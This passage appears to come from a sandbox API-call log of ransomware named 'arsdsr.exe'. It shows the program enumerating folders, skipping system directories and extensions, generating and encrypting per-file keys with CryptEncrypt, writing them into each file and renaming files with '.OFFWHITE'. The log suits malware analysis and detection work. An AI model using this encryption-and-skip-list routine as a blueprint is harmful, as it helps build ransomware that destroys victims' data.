Flags=0x0, Size=0x100) returned 0x5662b0 [0154.375] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.375] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.375] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0154.375] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.375] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.375] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0154.375] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.375] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.375] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0154.375] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.375] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.375] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0154.375] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x97958, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.375] SetLastError (dwErrCode=0x0) [0154.376] WriteFile (in: hFile=0x21c, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.391] GetLastError () returned 0x0 [0154.391] GetLastError () returned 0x0 [0154.391] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x97a58, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.391] WriteFile (in: hFile=0x21c, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.391] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x97b58, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.391] WriteFile (in: hFile=0x21c, lpBuffer=0x543f28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x543f28*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0154.391] GetProcessHeap () returned 0x500000 [0154.391] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x97958) returned 0x2a60020 [0154.392] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.392] ReadFile (in: hFile=0x21c, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x97958, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295dec0*=0x97958, lpOverlapped=0x0) returned 1 [0154.442] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.442] WriteFile (in: hFile=0x21c, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x97958, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295decc*=0x97958, lpOverlapped=0x0) returned 1 [0154.443] GetProcessHeap () returned 0x500000 [0154.443] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0154.446] CloseHandle (hObject=0x21c) returned 1 [0154.447] GetProcessHeap () returned 0x500000 [0154.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0154.447] GetProcessHeap () returned 0x500000 [0154.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0154.447] GetProcessHeap () returned 0x500000 [0154.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0154.447] GetProcessHeap () returned 0x500000 [0154.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0154.447] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" [0154.447] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.OFFWHITE") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.OFFWHITE" [0154.447] MoveFileW (lpExistingFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.OFFWHITE" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.offwhite")) returned 1 [0154.448] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="Tulips.jpg", cAlternateFileName="")) returned 0 [0154.448] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0154.448] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0154.448] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0154.448] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0154.448] lstrcmpiW (lpString1="Recorded TV", lpString2=".") returned 1 [0154.448] lstrcmpiW (lpString1="Recorded TV", lpString2="..") returned 1 [0154.448] lstrcmpiW (lpString1="Recorded TV", lpString2="...") returned 1 [0154.448] lstrcmpiW (lpString1="Recorded TV", lpString2="windows") returned -1 [0154.448] lstrcmpiW (lpString1="Recorded TV", lpString2="$recycle.bin") returned 1 [0154.449] lstrcmpiW (lpString1="Recorded TV", lpString2="rsa") returned -1 [0154.449] lstrcmpiW (lpString1="Recorded TV", lpString2="ntuser.dat") returned 1 [0154.449] lstrcmpiW (lpString1="Recorded TV", lpString2="programdata") returned 1 [0154.449] lstrcmpiW (lpString1="Recorded TV", lpString2="appdata") returned 1 [0154.449] lstrcmpiW (lpString1="Recorded TV", lpString2="program files") returned 1 [0154.449] lstrcmpiW (lpString1="Recorded TV", lpString2="program files (x86)") returned 1 [0154.449] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Public\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0154.449] lstrcatW (in: lpString1="C:/Users\\Public\\", lpString2="Recorded TV" | out: lpString1="C:/Users\\Public\\Recorded TV") returned="C:/Users\\Public\\Recorded TV" [0154.449] lstrcatW (in: lpString1="C:/Users\\Public\\Recorded TV", lpString2="\\" | out: lpString1="C:/Users\\Public\\Recorded TV\\") returned="C:/Users\\Public\\Recorded TV\\" [0154.449] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Public\\Recorded TV\\" | out: lpString1="C:/Users\\Public\\Recorded TV\\") returned="C:/Users\\Public\\Recorded TV\\" [0154.449] lstrcatW (in: lpString1="C:/Users\\Public\\Recorded TV\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Recorded TV\\*.*") returned="C:/Users\\Public\\Recorded TV\\*.*" [0154.449] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Recorded TV\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0154.449] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0154.449] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0154.450] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0154.450] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0154.450] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0154.450] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0154.450] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0154.450] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0154.450] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0154.450] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0154.450] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0154.450] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0154.450] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0154.450] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0154.450] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0154.450] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0154.450] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Recorded TV\\" | out: lpString1="C:/Users\\Public\\Recorded TV\\") returned="C:/Users\\Public\\Recorded TV\\" [0154.450] lstrcatW (in: lpString1="C:/Users\\Public\\Recorded TV\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Recorded TV\\desktop.ini") returned="C:/Users\\Public\\Recorded TV\\desktop.ini" [0154.450] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.450] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.450] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0154.450] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0154.450] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0154.450] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0154.450] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0154.450] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0154.451] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0154.451] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0154.451] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0154.451] lstrcmpiW (lpString1="Sample Media", lpString2=".") returned 1 [0154.451] lstrcmpiW (lpString1="Sample Media", lpString2="..") returned 1 [0154.451] lstrcmpiW (lpString1="Sample Media", lpString2="...") returned 1 [0154.451] lstrcmpiW (lpString1="Sample Media", lpString2="windows") returned -1 [0154.451] lstrcmpiW (lpString1="Sample Media", lpString2="$recycle.bin") returned 1 [0154.451] lstrcmpiW (lpString1="Sample Media", lpString2="rsa") returned 1 [0154.451] lstrcmpiW (lpString1="Sample Media", lpString2="ntuser.dat") returned 1 [0154.451] lstrcmpiW (lpString1="Sample Media", lpString2="programdata") returned 1 [0154.451] lstrcmpiW (lpString1="Sample Media", lpString2="appdata") returned 1 [0154.451] lstrcmpiW (lpString1="Sample Media", lpString2="program files") returned 1 [0154.451] lstrcmpiW (lpString1="Sample Media", lpString2="program files (x86)") returned 1 [0154.451] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Recorded TV\\" | out: lpString1="C:/Users\\Public\\Recorded TV\\") returned="C:/Users\\Public\\Recorded TV\\" [0154.451] lstrcatW (in: lpString1="C:/Users\\Public\\Recorded TV\\", lpString2="Sample Media" | out: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media") returned="C:/Users\\Public\\Recorded TV\\Sample Media" [0154.451] lstrcatW (in: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media", lpString2="\\" | out: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\") returned="C:/Users\\Public\\Recorded TV\\Sample Media\\" [0154.451] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\") returned="C:/Users\\Public\\Recorded TV\\Sample Media\\" [0154.451] lstrcatW (in: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\*.*") returned="C:/Users\\Public\\Recorded TV\\Sample Media\\*.*" [0154.451] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Recorded TV\\Sample Media\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x40003e, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0154.452] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0154.452] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x40003e, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0154.452] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0154.452] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0154.452] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x40003e, dwReserved1=0x295e9f0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0154.452] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0154.452] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0154.452] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0154.452] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0154.452] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0154.452] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0154.452] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0154.452] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0154.452] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0154.452] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0154.452] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0154.452] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\") returned="C:/Users\\Public\\Recorded TV\\Sample Media\\" [0154.452] lstrcatW (in: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned="C:/Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" [0154.453] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.453] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.453] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0154.453] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0154.453] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0154.453] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0154.453] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0154.453] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0154.453] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0154.453] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0154.453] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x40003e, dwReserved1=0x295e9f0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 1 [0154.453] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".") returned 1 [0154.453] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="..") returned 1 [0154.453] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="...") returned 1 [0154.453] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="windows") returned -1 [0154.453] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="$recycle.bin") returned 1 [0154.453] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="rsa") returned 1 [0154.453] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="ntuser.dat") returned 1 [0154.453] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="programdata") returned 1 [0154.453] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="appdata") returned 1 [0154.453] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="program files") returned 1 [0154.453] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="program files (x86)") returned 1 [0154.453] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\") returned="C:/Users\\Public\\Recorded TV\\Sample Media\\" [0154.453] lstrcatW (in: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\", lpString2="win7_scenic-demoshort_raw.wtv" | out: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned="C:/Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" [0154.453] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.453] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.453] PathFindExtensionW (pszPath="win7_scenic-demoshort_raw.wtv") returned=".wtv" [0154.453] lstrcmpiW (lpString1=".wtv", lpString2=".exe") returned 1 [0154.453] lstrcmpiW (lpString1=".wtv", lpString2=".log") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".cab") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".cmd") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".com") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".cpl") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".ini") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".dll") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".url") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".ttf") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".mp3") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".pif") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".mp4") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".OFFWHITE") returned 1 [0154.454] lstrcmpiW (lpString1=".wtv", lpString2=".msi") returned 1 [0154.454] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0154.454] GetProcessHeap () returned 0x500000 [0154.454] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543f38 [0154.454] CreateFileW (lpFileName="C:/Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0154.454] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=9699328) returned 1 [0154.455] GetProcessHeap () returned 0x500000 [0154.455] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0154.455] GetProcessHeap () returned 0x500000 [0154.455] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0154.455] GetProcessHeap () returned 0x500000 [0154.455] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0154.455] GetProcessHeap () returned 0x500000 [0154.455] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0154.455] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.455] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.455] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0154.455] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.455] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.455] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0154.455] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.455] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.455] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0154.455] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.455] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.455] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0154.455] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x940000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.456] SetLastError (dwErrCode=0x0) [0154.456] WriteFile (in: hFile=0x21c, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.457] GetLastError () returned 0x0 [0154.457] GetLastError () returned 0x0 [0154.457] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x940100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.457] WriteFile (in: hFile=0x21c, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.457] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x940200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.457] WriteFile (in: hFile=0x21c, lpBuffer=0x543f38*, nNumberOfBytesToWrite=0x8, 